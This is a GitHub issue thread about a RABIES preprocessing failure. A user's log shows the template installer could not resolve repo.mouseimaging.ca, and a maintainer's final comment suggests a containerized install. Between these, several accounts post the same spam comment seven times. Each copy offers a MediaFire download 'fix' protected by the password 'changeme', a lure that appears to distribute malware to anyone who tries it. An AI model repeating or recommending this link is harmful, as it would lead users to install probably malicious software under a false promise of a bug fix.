### ISSUE TITLE
An error occurred while using RABIES preprocessing: subprocess.CalledProcessError

### ISSUE THREAD

**Issue by JianhuiFeng06** [CoBrALab/RABIES#381]
**Describe the bug**
When I use the example dataset and run the preprocessing command `rabbies preprocess test_dataset/ preprocess_outputs/ --TR 1.0s --no_STC`, 
the error occurs: subprocess.CalledProcessError: Command 'install_DSURQE.sh /home/jhfeng/.local/share/rabies' returned non-zero exit status 6.

The installation command I used was: `pip install rabies`， and my environment already satisfies other dependencies
I'm not sure if there was some error when I installed

**Attach log file**
2024-08-27 15:26:18,962 - root - INFO - SOME FILES FROM THE DEFAULT TEMPLATE ARE                                                                                                           MISSING. THEY WILL BE INSTALLED BEFORE FURTHER PROCESSING.
2024-08-27 15:27:32,921 - root - WARNING -   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:--  0:00:09 --:--:--     0curl: (6) Could not resolve host: repo.mouseimaging.ca
Warning: Problem : timeout. Will retry in 1 seconds. 5 retries left.
  0     0    0     0    0     0      0      0 --:--:--  0:00:03 --:--:--     0curl: (6) Could not resolve host: repo.mouseimaging.ca
Warning: Problem : timeout. Will retry in 2 seconds. 4 retries left.
  0     0    0     0    0     0      0      0 --:--:--  0:00:09 --:--:--     0curl: (6) Could not resolve host: repo.mouseimaging.ca
Warning: Problem : timeout. Will retry in 4 seconds. 3 retries left.
  0     0    0     0    0     0      0      0 --:--:--  0:00:02 --:--:--     0curl: (6) Could not resolve host: repo.mouseimaging.ca
Warning: Problem : timeout. Will retry in 8 seconds. 2 retries left.
  0     0    0     0    0     0      0      0 --:--:--  0:00:08 --:--:--     0curl: (6) Could not resolve host: repo.mouseimaging.ca
Warning: Problem : timeout. Will retry in 16 seconds. 1 retries left.
  0     0    0     0    0     0      0      0 --:--:--  0:00:06 --:--:--     0curl: (6) Could not resolve host: repo.mouseimaging.ca

Traceback (most recent call last):
  File "/home/jhfeng/anaconda3/envs/mouse/bin/rabies", line 3, in <module>
    execute_workflow()
  File "/home/jhfeng/anaconda3/envs/mouse/lib/python3.9/site-packages/rabies/run_main.py", line 501, in execute_workflow
    install_DSURQE(log)
  File "/home/jhfeng/anaconda3/envs/mouse/lib/python3.9/site-packages/rabies/run_main.py", line 718, in install_DSURQE
    rc = run_command(f'install_DSURQE.sh {rabies_path}', verbose=True)
  File "/home/jhfeng/anaconda3/envs/mouse/lib/python3.9/site-packages/rabies/preprocess_pkg/utils.py", line 896, in run_command
    process = subprocess.run(
  File "/home/jhfeng/anaconda3/envs/mouse/lib/python3.9/subprocess.py", line 524, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command 'install_DSURQE.sh /home/jhfeng/.local/share/rabies' returned non-zero exit status 6.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gab-D-G** [comment]
Hi @JianhuiFeng06 , I would highly recommend trying the containerized installation of the pipeline through Docker/Apptainer https://rabies.readthedocs.io/en/latest/installation.html#container-singularity-docker. You are attempting a local installation, which will likely require lots of troubleshooting.
